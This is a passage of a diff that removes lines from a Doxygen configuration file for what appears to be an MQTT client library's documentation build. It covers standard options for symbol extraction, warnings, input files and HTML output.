-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-STRIP_FROM_PATH        = @PROJECT_SOURCE_DIR@/src
-INPUT                  = @PROJECT_SOURCE_DIR@/src/MQTTClient.h \
-                         @PROJECT_SOURCE_DIR@/src/MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
